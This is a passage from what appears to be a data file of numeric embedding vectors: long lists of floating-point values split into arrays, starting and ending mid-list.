16193835,0.0048958217,-0.008439217,-0.0007927711,0.011192392,0.024254687,-0.010228924,0.023355432,-0.019812956,0.0034187664,-0.020873157,0.0031221332,-0.019279541,0.013883181,-0.033610694,0.020725355,-0.014426148,0.006365964,-0.027067041,-0.008466323,-0.006929892,-0.011358734,-0.009167723,-0.023750005,-0.012997908,-0.013235515,0.017983664,0.0012842813,-0.020986432,0.005843466,-0.025062973,0.007337817,-0.06104562,0.031806406,-0.00036655157,-0.011775832,-0.016548395,0.003927023,-0.005991354,-0.02138246,-0.007253539,-0.001986489,-0.009206036,-0.037310775,0.006867846,0.011263394,0.010445846,-0.024718866,0.012031719,0.02814198,0.013704133,0.0041491464,-0.0034212954,0.011523082,0.007695065,0.029554479,-0.013341509,0.004477317,0.03249551,-0.016208427,-0.0083242515,0.021884952,0.022449827,-0.024510222,0.02152141,0.00017714321,0.038584504,-0.017866334,-0.025552846,0.0068432293,0.007095329,0.034160994,-0.015247012,0.022417031,0.0140181,-0.010000503,-0.0075356215,-0.006283181,0.0064053736,0.014367853,-0.026900085,0.0006812077,-0.015288474,0.014574528,0.0040631234,0.014444159,-0.022663407,-0.023714738,0.0041373596,-0.0072446377,0.0053815995,0.010094099,0.017729454,0.022455195,-0.003017524,-0.014492203,0.015802275,0.04085574,-0.046088237,-0.0016650043,0.01355359,0.008107467,-0.020191114,-0.025859738,0.015305717,0.022145944,0.010387737,-0.017888345,0.012100847,-0.019975966,0.012321153,0.016369741,-0.0031522713,-0.01955291,-0.010489269,0.0023527169,-0.031257614,0.020798607,-0.0136624705,-0.038081024,-0.000014226167,0.02014455,-0.029475288,-0.035535462,0.006581115,0.0053743455,0.011459432,-0.011563872,-0.01158894,0.014838662,0.01616801,-0.00018830429,0.02924898,0.012290966,-0.02436218,-0.013312455,-0.0012409842,-0.022204876,-0.0028885303,-0.015696676,0.0077858167,-0.019662881,0.01483495,0.012514242,0.016157072,0.006829566,0.009516948,0.012924548,-0.02078898,0.0013847994,-0.00725894,-0.0019888284,-0.002253653,-0.013245746,-0.02460471,-0.01246289,0.026667317,0.06100444,-0.063029535,-0.0077733737,0.027317319,-0.0058434797,-0.008408145,0.04572591,-0.000017919123,-0.03659328,-0.010776949,0.011913511,0.016401906,0.009276718,-0.039131343,0.0012676439,0.029132355,-0.015110071,-0.011075106,0.014865828,0.0067264456,-0.0010360198,0.00022989181,0.0033898877,0.00043722492,-0.0058175763,-0.016809216,-0.025755566,-0.013149565,0.0040961187,0.020234162,0.004691498,-0.0013260215,0.0047225812,-0.015597928,0.015965583,0.009276225,0.0030687444,0.0030736944,0.012542778,-0.0030967896,-0.030242285,-0.0012206665,-0.004064517,-0.014660704,0.013851236,-0.019819096,-0.008130585,0.0014638142,0.012540207,0.096695945,-0.014505633,0.0044268174,0.011690125,0.01466024,-0.0055181244,0.009568642,0.011750319,0.01726274,0.009486553,0.008004685,-0.019519545,0.020900356,0.037085243,-0.022253716,0.009571369,0.01799768,0.09627227,-0.006851888,0.029246697,0.008779917,0.0008924141,0.004883579,0.013920311,0.028787622,-0.0133826835,-0.0057464554,-0.04149883,0.0006171991,-0.0040128883,-0.012464804,0.013324575,0.01624611,0.023381155,0.010824545,0.012880204,-0.010723759,0.015737137,-0.020463694,0.0033395388,0.017911665,0.006215166,-0.0019406619,0.029393103,-0.0055737556,-0.009687698,-0.03863304,0.01833229,-0.024025023,0.02808993,0.016462652,-0.0282445,0.02071594,-0.0016166454,-0.004753796,-0.008354479,0.024971543,0.015300166,-0.027192686,0.019569071,0.0044287946,0.0008729113,-0.0038471767,0.008622959,-0.023681026,0.014188734,0.003584561,0.025338339,0.0096198935,-0.015330828,0.02380079,0.0017404656,-0.0013972806,0.0041268314,0.02525675,0.012374636,-0.0015615774,0.022208422,0.0054709176,-0.0077150315,0.028923286,0.026042385,-0.019505972,-0.0013441575,0.020367945,0.015417006,0.02202339,-0.0149126,0.014556784,0.0002890188,0.02545065,-0.016674729,-0.023590127,0.0041827876,0.0155434515,0.009420948,0.0010485003,-0.011641453,0.021676505,-0.0054515433,-0.013302945,0.011431735,-0.017548429,-0.014882875,-0.005023384,0.015136231,-0.0037073784,-0.014805656,0.0009863735,0.0053222235,-0.0072247344,0.008786254,-0.016996656,0.013411726,-0.0027053417,0.0010334882,0.010030167,0.020873554,-0.008404869,0.0013624135,-0.0032104026,-0.0041146167,-0.0041642278,-0.0010885681,-0.022406887,0.016866753,0.035810884,-0.0065472443,-0.007115922,-0.0065514892,-0.013484706,0.0002846179,0.02312447,0.038791362,-0.021072978,-0.004977334,0.010738728,-0.04322121,-0.019842686,-0.020513935,0.008554119,0.004993502,-0.0028160466,-0.009932096,-0.0052278065,-0.0043647527,0.013014481,0.016077152],[0.004306801,-0.0031329396,-0.014020507,-0.020327656,0.012004103,-0.0042107017,0.007062739,0.0025344638,-0.009027365,-0.011185277,-0.004851489,0.006202684,0.00076845963,-0.0049980725,-0.014869497,-0.0009850378,0.013158511,-0.007283885,-0.0052120984,0.005886002,0.0061960034,-0.0014606364,0.0025084473,-0.006868476,0.012557148,0.008109032,0.015133507,-0.010280017,-0.0043978314,0.01758184,-0.006047858,0.03316737,0.01042251,-0.00158711,-0.011904947,-0.006859098,-0.016672896,-0.0033454164,0.0038529169,0.00036791345,-0.013741613,0.011078149,-0.0033660498,0.024263911,-0.014294008,-0.0049662977,-0.0040487163,0.013672728,-0.015657617,0.00093726953,-0.011616164,-0.0027396074,-0.035811465,0.016955826,0.0017789877,0.010064297,0.008877465,-0.04034891,0.0057560666,-0.0065263486,-0.0068495935,0.039864305,-0.0073337196,-0.012060648,0.037128497,-0.018382693,-0.003048297,-0.030986913,-0.019571116,-0.009945311,-0.008548149,-0.002453821,0.00017098959,0.006080592,0.027222948,-0.0016368855,0.0071518994,-0.01156725,-0.02471612,0.016088713,-0.010969698,-0.004747541,0.005165934,-0.0073015597,-0.0040038824,-0.013587566,-0.010284426,-0.008881886,-0.013699058,-0.021703655,-0.018337674,-0.0009993698,0.0004220497,0.0038673102,0.002116795,0.017772408,0.021866305,-0.008277075,-0.00092595187,0.020920813,-0.005768334,0.0100664925,-0.0027435808,0.0077887913,0.002995834,-0.01653513,-0.02090362,-0.016152225,0.0035323817,-0.00016581675,-0.005986611,0.0025184823,0.003988686,0.007812026,0.016429137,0.011088242,0.0056209946,0.0020765674,-0.014707444,-0.004308347,-0.0047013075,0.013897402,0.026094511,0.00091049913,-0.010399715,-0.021481851,-0.018550169,0.020834297,0.0032477323,-0.000100193916,-0.010358242,0.023992935,0.0039061648,-0.02243463,-0.0012783716,-0.009615096,0.0014735891,-0.009977875,0.008348446,-0.015297842,0.00518571,-0.0019267804,0.007621165,0.0008875941,0.01451936,0.033302974,-0.0099049695,0.031115329,0.0065773013,0.00018565082,0.01274801,-0.0024897,-0.0027665282,-0.0024612895,-0.0042942995,0.025020605,0.007814254,-0.005280809,-0.012084274,0.0008104796,-0.017801026,0.024261989,0.02178823,-0.019592265,-0.003916412,-0.02163816,0.006010979,-0.0024396023,-0.009762375,0.0007595478,0.04200172,0.0047058365,0.022844683,0.028673677,0.0066784285,0.009964393,0.011858028,-0.018204229,-0.014107521,0.004052332,0.0014860391,0.0021636614,0.007166225,-0.01005905,0.0055071195,0.020180542,0.0021783593,-0.0022538651,-0.015047193,0.0005816041,-0.008900421,-0.03061936,-0.0045915334,-0.01628826,-0.020996256,-0.025808541,-0.0062046456,0.120892115,0.0023716574,-0.009862901,-0.029482141,0.005859253,-0.00028007338,-0.021891233,-0.0067790174,0.006067312,0.0022859783,-0.0024068772,0.01827126,0.008551873,0.023441114,-0.012666493,-0.008302438,0.012891044,0.0063361796,-0.06344876,0.002471618,0.037461504,0.020923145,0.015874457,-0.013253364,0.005203802,0.008088341,-0.03533885,-0.0116770435,-0.006880605,-0.012111255,-0.007082157,0.014451044,-0.02618988,0.016725224,0.0067051905,-0.013802386,-0.024349883,0.00994803,-0.01857602,0.011332087,-0.007807498,-0.005669283,-0.010284649,-0.0056560608,-0.0003699645,0.035887096,0.019297708,-0.0245413,-0.01053149,0.021522854,0.017782537,0.0020481593,0.005242202,0.009885494,0.005479092,0.00096666254,0.016392091,-0.009161901,0.00022922967,0.008434475,-0.015859902,-0.0033027597,0.0052802716,0.027949976,0.013053261,-0.0016011229,0.030381905,0.039447602,0.004742301,0.0067010773,-0.04082195,-0.020699494,-0.0067349966,-0.027405208,0.008175007,-0.008242926,0.011061578,0.00723772,-0.012839609,0.008956106,0.0008291911,0.0047149076,0.014698113,-0.000648753,0.0042527737,-0.01364079,-0.023757737,0.0054642116,0.010310283,-0.017983135,0.005080285,0.016061395,-0.001930756,-0.017939433,-0.0028336053,0.028577125,0.003013156,-0.013811626,-0.008614759,-0.0005969913,-0.000022283259,0.009687696,-0.004940288,0.0077740946,-0.00498124,0.023978177,-0.0008774312,-0.0109350765,-0.0030283693,-0.00089877855,0.047733814,-0.028594814,-0.014323077,-0.028188275,0.0064801234,-0.022651494,0.01744412,0.0039961017,0.011915879,-0.00353998,-0.0042722654,-0.018470809,0.0080342,0.01605368,-0.037093733,0.020676898,-0.021232782,-0.002562208,0.00040547922,0.014490091,-0.0038775804,0.017317573,0.005662597,-0.009206138,0.008101465,0.018008761,0.022781039,0.0013821335,0.02411355,-0.010158559,0.014065125,0.0026999307,0.004870206,-0.017664272,0.0011743022,0.019593095,0.015066511,0.0048844996,-0.028271358,-0.0060561053,-0.007064605,0.01189588,0.009752542,0.011965044,-0.003995926,0.0030232116,0.02031632,-0.016289625,0.013252564,-0.004173812,-0.009524643,-0.0002791627,-0.026157893,0.0095482385,-0.014780643,-0.008530282,-0.007670886,0.06482884,-0.012508294,0.0018906072,0.018936517,-0.019699369,-0.008984633,0.03384907,-0.0019065881,0.011095574,0.0054757586,-0.022233685,-0.0016631705,0.010091165,0.012109704,-0.007872302,0.011429873,-0.013933504,-0.027828723,-0.0189022,-0.03271044,0.019262396,-0.0003030164,0.014899844,0.020122517,0.009795484,0.016840862,0.0063122055,0.008856582,0.0026284575,0.0020834813,-0.003268099,-0.0018522306,0.0070256838,0.007062928,-0.04700144,0.009971101,-0.0033615795,0.005080152,-0.011960537,-0.0034851914,-0.0144578675,-0.009790084,-0.007729359,-0.02172646,-0.0063300133,0.041295044,-0.005663922,-0.012527285,-0.026394943,0.010257435,0.0021098207,0.018433299,-0.033494134,0.013514041,0.0029177922,-0.005452734,0.017442772,-0.022868428,0.04445838,0.016415568,0.029089082,0.019648418,0.00024688593,0.002630385,-0.0035957275,0.024470117,-0.0035539768,-0.01423186,-0.0037434145,0.004589853,-0.0017913757,0.0014647131,0.001952904,0.0146282185,-0.014282672,0.017028863,-0.0007619277,0.003008059,0.009998544,0.014689468,-0.020165754,0.006334643,0.010813986,0.006710564,-0.01355416,0.016147856,0.0131496,0.019233732,0.022126393,-0.007744049,-0.014046633,0.016334383,0.0061651017,0.0041331975,0.027287995,0.04255375,0.025313795,0.013362878,0.008359617,0.009010055,0.005543829,0.0005207421,-0.0015259691,-0.015930697,-0.011553215,0.004742711,0.0024260476,-0.009894422,-0.004034317,0.029586107,-0.0009611663,-0.006780201,0.016696572,-0.017179983,0.0041761375,-0.008690944,-0.009171452,-0.012852761,-0.0039708354,-0.0024087387,0.045843404,-0.009578644,0.011136962,0.012202026,0.0024652602,-0.006063111,-0.0016851263,-0.0025239766,-0.010236398,0.01028652,-0.020836243,0.021908164,0.011917784,-0.0378478,0.015312591,-0.013207912,-0.017091705,-0.022707622,0.02484328,-0.00014190757,0.026074247,0.024704894,0.03189412,0.0021679297,-0.008530127,0.01562771,0.044279855,-0.0018294898,-0.02811395,-0.014522441,-0.00012400819,-0.0052777445,-0.0119855665,-0.0056491513,-0.0028671485,0.0012617903,0.022899305,-0.029651813,-0.0063948506,0.0047817985,0.041798774,-0.02916125,0.02472767,-0.00048870535,0.0069193016,0.018283073,-0.00073233835,0.06509901,-0.012379246,-0.030888885,-0.0017949108,0.011995802,0.020099707,-0.013376223,0.023092307,-0.012411655,0.0120184915,-0.0022039816,0.012583262,0.023840604,0.028551904,-0.02440528,-0.0074085845,0.011100345,-0.0057921465,-0.0082434,0.016285868,0.0038946203,0.00043979118,-0.0059454218,-0.0061756345,-0.011093588,0.013475359,0.02966249,0.0060576727,-0.03114939,-0.02042895,-0.017050156,-0.0058976454,0.008950479,-0.0047481386,0.011508489,0.00976032,0.017909624,0.009177148,-0.0014160371,0.025666812,0.000541146,0.006173231,0.0131330425,0.0040121935,0.011494509,0.01734731,0.013284703,0.007037438,0.0132079115,0.011478823,-0.0001816871,0.011102489,0.011853211,0.0040103397,-0.038434047,-0.0051378077,0.006643047,0.010757144,-0.0061582215,0.0036256164,-0.011348163,-0.015321477,-0.020784661,-0.018871972,-0.020454377,-0.0034131142,-0.004121689,-0.0012950341,0.0035308779,-0.028928826,-0.003415519,-0.007496615,-0.0040750657,-0.011303848,0.020314729,0.011608707,-0.013968845,0.03279918,0.004454755,-0.015264101,-0.0038120465,-0.007166121,0.0069108866,0.0021981422,0.016361978,-0.0098291235,-0.010527121,-0.0019088051,0.0032908644,-0.0140253,-0.0021225244,-0.01050979,0.013110458,0.010604093,0.018799655,-0.0056772497,0.008789169,-0.04913638,-0.0047276975,0.02919791,-0.0039289366,0.008219727,-0.015335978,0.03289436,-0.011471976,-0.0072494713,-0.0018662004,0.015749797,0.000105988096,-0.024698691,0.007491078,-0.056048382,0.0015694337,0.01772915,0.021654254,0.008020983,0.033725567,0.025629535,0.015579432,0.003462765,-0.013146347,-0.014942548,-0.0016817861,0.009886547,-0.0072915787,0.02407888,-0.010011578,-0.023451034,-0.012747372,-0.021716602,-0.03527523,0.0035553228,0.02558822,0.00251162,0.0062265545,0.016423319,0.022874396,0.007903992,-0.003505901,-0.022995362,-0.03324736,0.005512506,0.004993584,-0.0073287026,0.00053923373,0.0019478943,-0.0019448503,-0.0061385543,-0.024637626,0.00008526974,0.005059034,-0.004429423,-0.003911458,-0.017462503,0.0069233743,-0.021990888,0.01747866,0.0020722854,0.029265355,-0.008400711,0.045222268,0.0004154076,0.012189213,-0.0018193773,0.010260157,-0.022124859,0.018723745,-0.005761159,0.023349557,-0.0017076727,0.00067542837,0.00835945,0.0089996755,-0.016841622,-0.010990452,0.030967087,0.016600704,0.041351594,0.020148778,0.024046583,0.009592632,0.022801334,0.02671183,0.013174577,0.0030181317,0.0050774985,0.022041555,0.0064765792,0.01031368,-0.010611134,-0.0001593893,-0.008177975,-0.016885387,-0.0008052346,0.020961791,0.027681213,-0.009957326,0.01294523,0.0022352557,0.014054525,0.010401017,0.01478075,-0.009224669,-0.009601273,-0.013687326,0.001171264,-0.018896855,0.0040377807,-0.03555505,-0.004430227,0.013830477,0.015129157,-0.033222042,-0.015240865,-0.019981148,0.0180398,-0.020732772,-0.01111142,-0.048834767,0.01484597,0.03247134,-0.008097856,-0.0065104137,0.016630301,-0.0034888797,-0.0042369314,0.0067655896,-0.020754777,-0.011149529,-0.024877733,-0.020139933,0.019112255,0.011133075,0.030246597,-0.0063292356,-0.020835651,-0.0026439603,-0.0018706567,0.0023561306,-0.0015716493,0.0036030123,-0.008469819,0.0094877,-0.004357607,0.00028626242,-0.019619845,-0.0019681202,0.002749122,-0.035518814,-0.015323173,-0.022839895,0.027455682,0.0072008073,0.021633515,-0.0077944174,0.01747859,0.023489822,0.01466035,0.019044211,-0.0011054404,0.009457618,0.011250184,0.025286347,-0.01522868,-0.022956543,-0.0075674327,0.001260595,-0.0012521774,0.009171069,-0.0077050063,-0.011888748,-0.018557154,-0.025100239,0.005912017,-0.02268641,0.001799615,0.0053768586,-0.036684334,0.016167061,-0.00591115,0.0042568026,0.017146092,-0.012224241,0.0094799725,-0.00923026,0.0010297961,-0.037558947,-0.00895657,0.0052828356,0.0044658314,0.01616101,0.009253492,-0.03661655,-0.029917484,-0.017117243,0.021545878,-0.00800655,0.009688414,0.0084702065,-0.0019650222,-0.035348255,0.010850275,-0.007860702,0.0043149195,-0.025948584,0.004492146,-0.004181539,0.00088486954,0.02101561,0.0126333255,-0.011891586,0.023646804,-0.023901938,-0.022363137,0.00778705,-0.001738712,0.0066935467,-0.0017772128,0.01825905,-0.01209447,-0.0035792007,0.028354775,-0.018599004,0.0062383874,0.03379932,0.0018735793,0.014337913,0.005643082,-0.014962858,-0.016749978,0.0001853152,-0.008297054,-0.021051757,-0.0039982195,-0.010029153,0.007271477,-0.0038433084,-0.010817712,0.024667703,0.0017979591,0.019692546,0.011245767,-0.00596075,-0.023067428,-0.009297846,0.00071291416,-0.014260173,0.011611883,-0.008743681,-0.016119242,0.039124627,0.023661425,-0.024149118,-0.0060938564,0.018307896,0.0069072973,-0.013052303,0.008950058,-0.030047815,-0.008531245,-0.019057343,0.021434372,-0.016573329,-0.015468043,-0.016359271,0.004239615,0.01667921,0.005000627,0.021737074,-0.01629426,-0.0040723924,0.003309601,-0.0062953266,-0.0015059256,-0.015399748,-0.0066120513,-0.029447213,-0.028157625,0.021279057,-0.013983169,0.012362811,0.009011043,0.0007001203,0.015414628,0.020631796,0.0013616564,0.0047051897,0.011243586,-0.010077542,0.017592393,0.0010032046,-0.00087478093,0.011519349,0.020398533,0.00024312746,0.017234871,-0.023589505,-0.022542348,-0.012028393,0.0032397173,0.010431344,-0.012554156,0.0019665558,0.0119617665,0.0061776075,-0.0048570633,-0.0090645375,-0.06263263,0.015281395,-0.008838619,-0.0101490645,0.01097864,0.005429737,0.0035355699,-0.010855928,0.028790206,-0.010479812,0.0118322745,-0.0015463678,0.0019867711,0.0006911615,0.0053977096,-0.009378476,-0.03503425,-0.032828614,0.019434564,-0.0018798386,-0.024273518,-0.0018721622,0.0136759505,-0.0021165542,0.02933553,0.012246969,0.0069530974,-0.011737385,-0.032617874,0.007340386,-0.015557199,0.004584429,-0.008852845,-0.0011682869,-0.0056658913,-0.01627658,0.0052643036,0.0154375825,-0.0062023625,-0.0052336003,-0.016651487,-0.022325464,0.004153077,0.03285336,-0.0019075101,-0.012790814,0.008105648,-0.019152516,0.00021097949,-0.03623172,0.019748848,-0.004869857,0.0050278455,0.009130103,-0.008914996,0.033180516,-0.02694219,0.015600768,0.014255002,0.02215254,0.003418446,-0.013122568,0.030610628,0.009412222,-0.010881845,-0.005460744,0.008781527,0.028349955,-0.017332379,-0.021612495,-0.009175992,0.0010174334,0.013354691,-0.023177609,-0.019237783,0.019653033,-0.019555932,-0.0055494374,-0.0065012826,-0.012335943,-0.024386238,0.006705813,-0.009840084,0.009220249,-0.011821321,0.013408702,-0.010088698,0.009181185,0.0086946115,-0.0033512071,-0.01072803,0.00095290854,0.0031996712,-0.00074663275,0.02522792,0.009793655,0.0038986632,-0.00067361444,-0.0037992725,0.00029380235,0.012899507,0.00060584,-0.008072365,0.06713114,0.001959947,0.0009494515,0.017366055,0.012661946,0.033923376,0.012260773,-0.008276333,-0.0032304788,0.0027520943,0.023524385,0.00088280765,0.009204027,-0.0008050047,-0.00027538225,0.0071382024,0.034754965,0.0072972304,-0.0016412862,0.008827838,0.017062694,0.004564771,-0.0015647268,0.014994519,0.005121018,-0.017149074,-0.009353645,0.0062912754,0.0042647286,0.010563966,-0.011740462,0.01606185,-0.0048840754,0.0024530638,-0.01245717,-0.030905565,-0.0016084095,-0.026920559,0.005222995,0.0040006023,0.014859188,0.0034145073,-0.011586121,-0.00067784433,0.020173328,-0.00427586,0.0055470807,0.006016337,0.013389094,-0.00087114226,0.011595332,-0.01047539,0.02831178,0.01332131,-0.014497608,-0.0068426644,0.007238098,-0.011778471,-0.02241269,-0.011432449,0.009864457,-0.036898036,0.005423603,-0.023452444,-0.009434894,-0.010600939,0.0064536384,-0.002333729,0.017194279,0.010349162,0.02868807,0.002053886,-0.024398288,0.016803535,-0.0033688683,-0.0041440823,0.0060331644,0.0062051723,0.030660842,-0.009197149,-0.0038673982,0.019759791,-0.025758805,-0.0047275466,-0.00963786,-0.021273734,0.0013958291,0.0016114684,0.002902949,0.003364978,0.0002272955,-0.017114513,0.047326796,-0.0056183883,0.017771605,-0.0034615523,-0.025739372,-0.0010826014,0.0126608405,0.017689688,0.009180863,-0.02773911,0.018850274,0.00622125,-0.041581478,-0.020315144,-0.00429846,-0.009606802,-0.008906206,-0.010608843,0.01646632,-0.005289781,-0.0005903553,-0.013944601,-0.006063771,0.007768505,-0.014756795,0.002477972,0.021106929,0.005598922,-0.0045742025,0.015413555,-0.018743694,0.004401551,0.018633204,-0.0025401386,-0.02004517,0.026931189,0.0056090793,0.01873664,0.0155729735,-0.017503759,0.005032432,0.017427826,0.009895,-0.0028938144,-0.019341378,0.0039758394,0.02866214,0.0015886492,-0.0112326685,-0.012754691,0.021242809,-0.0032293655,-0.0110380985,0.016510032,0.016654614,0.000027814962,0.018991347,0.011713691,-0.007095463,-0.02862175,0.016364705,-0.027011396,-0.0132494485,-0.0060110004,-0.011871487,-0.011159486,0.0047150967,-0.00003952303,-0.001406523,-0.011407608,-0.009442767,-0.00907945,0.017850239,0.027231244,-0.0033346016,-0.0005496193,-0.009714972,-0.0073491675,0.015624777,-0.017637076,-0.0023861334,-0.0066922577,0.0014554634,0.020105915,0.013182214,-0.006311067,0.00916041,0.0045107044,-0.020416077,0.01597038,0.010250645,0.0070851757,-0.022744931,0.03567657,-0.003829044,-0.010008631,-0.023010664,-0.0118398005,0.005860715,0.0055329786,-0.005008884,-0.017524406,0.0141868275,-0.003860791,-0.018110424,0.083819225,-0.013127728,0.010593398,-0.02192773,0.016811173,-0.0035678344,0.015413854,0.0019414999,0.016127143,-0.0131092165,-0.023296688,-0.011969312,-0.005686859,-0.004131644,0.024816174,-0.0012065638,0.0076261307,0.0121809635,0.008867286,0.021561654,0.007218917,-0.0011053974,-0.00035126504,0.0048166346,0.001746737,0.019317701,0.025304057,-0.012951613,-0.0027394076,0.002164659,0.0020384558,-0.013970311,0.026014157,0.0076268916,0.008510781,-0.0041608694,0.0077483766,-0.013734504,-0.014055572,0.015486974,0.0014108643,-0.0113462005,0.035319593,0.004574797,-0.005377714,-0.009571248,-0.0052624755,-0.0038576724,-0.01969597,0.0124412235,-0.008765881,-0.0054430896,-0.0028718445,0.012247089,-0.016519926,0.02497188,-0.0041206866,0.017737119,0.024060044,0.00091681344,0.021278514,0.03335813,-0.0030419189,-0.012404058,-0.008774759,0.000004684651,-0.022391722,-0.020661732,0.015635857,-0.018884081,0.014200382,0.0039514587,0.012895359,0.0012067468,0.0016573636,0.014648559,0.01833436,-0.010927531,-0.005875834,-0.0197237,-0.012349709,0.01594353,0.036157925,0.0064074793,-0.007769749,0.0076877754,0.014301101,0.018132709,0.044975013,0.011614116,0.01160247,-0.009526783,0.008076852,0.017751807,0.021765774,0.025510173,-0.01304323,-0.0051604146,-0.021409085,0.018951807,-0.014026549,0.010106047,0.005386129,-0.020747637,0.006642977,-0.009464412,0.009921674,-0.027448364,0.0044763894,0.03486828,-0.0020355585,0.01237458,0.0031039193,0.009760423,0.0037214826,0.001217185,-0.002134314,-0.030122938,-0.008424456,0.0012637698,0.017804218,-0.0063716103,-0.0025333897,-0.048304368,-0.008810326,0.17240351,0.0030598794,0.010039236,0.026270948,0.004046578,0.0011718733,-0.12984914,-0.0012161627,0.0016692138,0.008775845,-0.0050850185,-0.0017681253,-0.008245733,0.015704975,-0.0008093811,0.0002611666,-0.0040130205,-0.02013233,0.0034714597,-0.016065355,-0.010461139,0.011896004,0.015875459,0.0019474622,-0.034281857,-0.016778305,0.0073764888,-0.012712629,-0.000028407181,-0.014894993,0.009380607,-0.010175478,0.0036792413,-0.0014555058,-0.010756662,0.010621784,0.030234404,0.02236603,-0.033541676,-0.0077975043,0.012504772,-0.017559651,-0.028565167,-0.03819143,-0.1617703,-0.0050199185,-0.023467759,-0.04051329,0.0072851568,-0.016179224,0.016845098,0.021298705,0.010021043,0.0061283805,0.025436077,0.025657961,0.0028949387,0.0085782325,-0.0233695,-0.0111093,0.007311754,0.00049067196,0.012753069,-0.0016046353,0.019257294,0.0051342933,-0.023806294,-0.0067885933,-0.025518425,0.010464306,0.021529198,0.027356084,-0.0042108935,-0.0058411416,-0.0025624447,0.004676553,-0.015902534,0.020568816,-0.0077126375,-0.01762644,-0.0106836995,-0.0009361388,-0.0044246735,0.027282743,-0.016619632,-0.0064096614,-0.01979051,-0.012101502,0.004512244,0.016115129,0.010801951,0.008960167,0.017095748,-0.009653254,0.017764479,-0.0006502819,-0.009364559,0.0021083194,-0.015463939,0.0014365378,-0.005331535,-0.015432136,-0.0032042852,0.016031753,0.00049280626,-0.0008463911,-0.008871134,-0.012133955,0.022812922,0.010394133,0.009502283,-0.032177206,0.005609286,0.029654419,-0.0022821866,-0.0014487233,-0.008217937,-0.025173135,0.018196896,0.013089901,-0.026810482,-0.014508657,0.004292742,-0.0093822135,0.026979476,-0.0038632497,-0.0034521702,-0.024305584,0.019256016,-0.018041037,-0.00986907,-0.0017533695,-0.021143507,0.0029177018,0.025890855,-0.0025147723,0.004732593,0.00010872443,0.018599806,0.002161425,0.014831563,-0.0037081682,-0.018351303,0.0021025252,-0.0049683065,-0.012033398,-0.008190488,0.005607926,-0.0150067685,0.012814919,0.0037552065,-0.02705404,-0.015387732,0.009850558,0.014610745,0.00046326293,0.023350816,-0.0011697403,-0.02621322,-0.014627457,0.01518334,0.017738946,0.000085064086,-0.010275384,-0.03710122,0.0060231676,-0.02140611,0.0031403212,0.032584347,0.023598146,-0.016987339,-0.006355098,-0.011018315,0.0077601047,0.0045165275,0.0052015847,0.0099750515,0.007527277,-0.012889644,-0.006235738,-0.012400915,0.013816119,-0.01537429,-0.012712813,-0.002294214,-0.0075046774,-0.014577555,-0.0045738053,-0.01027353,-0.003518295,0.050491355,-0.017072627,0.031227238,-0.013043552,0.009791783,0.027278027,-0.023925945,-0.016911881,0.021082185,0.07376583,0.011785708,0.0005173757,0.018641077,-0.0077837068,-0.0013850027,0.020802373,-0.017608607,-0.017574118,-0.02368532,-0.010385804,0.0075098365,-0.0074055465,0.025724797,-0.024234805,0.019824278,-0.0007828006,0.0144851785,-0.024871923,0.013477964,0.024520898,-0.022282578,0.010142549,0.0151762385,-0.007163334,0.009646093,0.0059071113,0.004886758,0.0016555649,-0.001632052,-0.012089887,-0.004889042,-0.0010840263,0.01503041,0.015103573,-0.03955742,-0.014544841,-0.013036949,-0.01042224,-0.012828644,0.0023609805,0.010440004,0.021184087,-0.012132497,0.007301937,-0.006249809,-0.013888903,-0.014908699,0.013315975,-0.013484838,0.00057308923,0.015935635,0.007590802,-0.00090227346,0.0013954437,-0.009698836,-0.0066104922,-0.01781908,-0.004916969,-0.005270942,0.024787908,-0.02778318,-0.036107615,-0.00679209,-0.0073975935,-0.003002826,-0.01091495,0.012013804,-0.0016243755,0.021095987,0.00017204462,0.0005609947,-0.0154013615,0.012588501,-0.009089711,-0.01123291,-0.022113003,0.0005444138,-0.01124072,0.023447523,0.012345587,0.034776386,-0.0031046662,0.0062331585,-0.0055487514,-0.04166163,-0.0071086492,0.015378806,-0.025804356,-0.0072813877,0.025348652,0.010866401,-0.012131936,0.0015203593,0.009840443,0.011416348,0.014706925,0.0025796937,0.009427138,-0.01337274,0.018894508,-0.002250784,-0.016682105,-0.020951444,-0.0021581799,-0.025223078,-0.0033190313,0.0016125336,0.0025994473,0.005628705,0.013922909,-0.03699892,0.010818829,-0.02116786,-0.0142639335,0.026294602,-0.025430767,0.0045947917,0.01201384,-0.008102909,0.0015556669,-0.0009797565,0.015494103,-0.023554802,0.012241665,-0.0034974995,-0.005452041,0.01581648,-0.03778543,0.008095676,0.0046446435,0.024508128,0.006012202,0.0009400885,-0.012096173,-0.016270826,0.0045013707,-0.00088512374,0.0029220502,0.01658162,-0.004065195,-0.0073391227,-0.013825817,-0.0068167932,0.009250417,0.0036561156,0.0112262,-0.014540905,-0.00367883,0.0012862352,0.0040014023,0.012911133,-0.011437307,0.002461279,0.020141125,0.013493158,-0.022695007,-0.014385966,-0.016105946,-0.010583569,0.010916069,0.03271065,0.010369572,-0.025922576,-0.0034755208,0.01802079,0.033644326,-0.008326195,0.008570001,0.0033412997,-0.006506629,-0.007679259,-0.012356754,-0.0069433716,-0.0061612944,0.0067376187,0.014342829,0.008698998,-0.014428193,-0.020353708,-0.0076257316,0.017074669,-0.014315802,-0.001815351,-0.0077009643,0.01496071,-0.00017793389,0.033065744,-0.01862504,0.018489247,0.0048343507,-0.0057382616,-0.02294533,0.025872689,-0.023482691,-0.009476844,0.024830522,-0.010449756,0.0018452653,0.030292094,0.007465842,0.008467717,-0.0077179656,-0.018657427,-0.006008377,-0.0024287684,-0.0041521504,-0.019405426,-0.014930131,0.009393779,-0.024892224,-0.011070065,-0.0075017414,0.015495285,-0.011106765,-0.007049132,0.01591777,0.024827858,0.0055311574,-0.02614578,0.016248696,0.011477093,-0.0066449535,0.00042723693,-0.007458929,-0.0001868363,-0.00930458,0.044358827,-0.020695366,-0.015325555,0.015675815,0.037653755,0.015195257,-0.020368176,-0.007037082,-0.030013135,-0.03217942,-0.007934915,-0.04630104,0.004131496,0.0044261958,-0.02596391,-0.008789877,0.019133095,0.00807554,0.008694853,0.00730469,0.004882651,0.013449751,0.02665941,0.001639075,-0.006426449,-0.05815538,-0.010804044,0.0049092206,-0.033696868,-0.004256571,0.0068274126,-0.02071055,-0.02548907,-0.008615709,0.007259955,-0.01742363,-0.0037515736,0.0062127383,0.013940293,0.0020571628,0.034823194,0.002823752,0.0077127684,0.016216166,-0.003711447,-0.0065801223,-0.0033236386,-0.0030098585,-0.04144449,0.008914006,-0.011855291,0.018024571,0.0060408306,0.01959048,-0.020193668,0.0054669203,0.0097111855,0.012071921,-0.01799336,0.017175592,0.026922343,-0.007897101,-0.010591238,-0.019168995,0.018621502,0.009882459,-0.017311482,-0.0057820696